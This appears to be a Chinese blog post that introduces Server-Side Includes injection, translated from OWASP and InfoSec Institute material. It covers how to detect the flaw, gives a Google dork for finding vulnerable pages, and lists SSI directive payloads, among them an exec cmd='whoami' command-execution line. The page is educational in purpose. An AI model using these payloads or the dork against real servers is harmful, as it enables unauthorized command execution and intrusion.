服务器端包含注入

本文深入探讨了服务器端包含注入 (SSI) 攻击的原理、常见漏洞利用方法及防御策略,包括识别后缀漏洞、利用 SSI 命令执行恶意代码等,并提供了实际案例分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文地址:[url]https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
[/url]
[url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]
服务器端包含注入SSI出现在动态填写HTML页面的场合。他们类似于CGIs,但是SSI用于在页面加载之前执行一些动作。为了这样,web服务器在提供页面给user之前分析SSI。
SSI攻击允许通过在HTML页面注入脚本或远程执行任意代码。可以通过操控SSI的使用或在user输入域中使用。
通过[quote]< ! # = / . " - > and [a-zA-Z0-9] [/quote]检查漏洞
另一种方法是识别页面是否包含 .stm, .shtm 和 .shtml后缀。
[color=blue]google dork:inurl:bin/cklb[/color]
可能导致操作文件系统和操控web服务器权限的进程。
例子:
[quote]<!--#echo var="DOCUMENT_NAME" -->[/quote]
显示当前文件名
[quote]<!--#echo var="DOCUMENT_URI" -->[/quote]
显示虚拟进程和文件名
[quote]<!--#config timefmt="A %B %d %Y %r"-->[/quote]
使用config和timefmt命令来控制时间和日期的格式
[quote]<!--#fsize file="ssi.shtml" -->[/quote]
显示选择的文件的大小
[quote] <!–#exec cmd==”whoami” –>.[/quote]
显示当前user
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值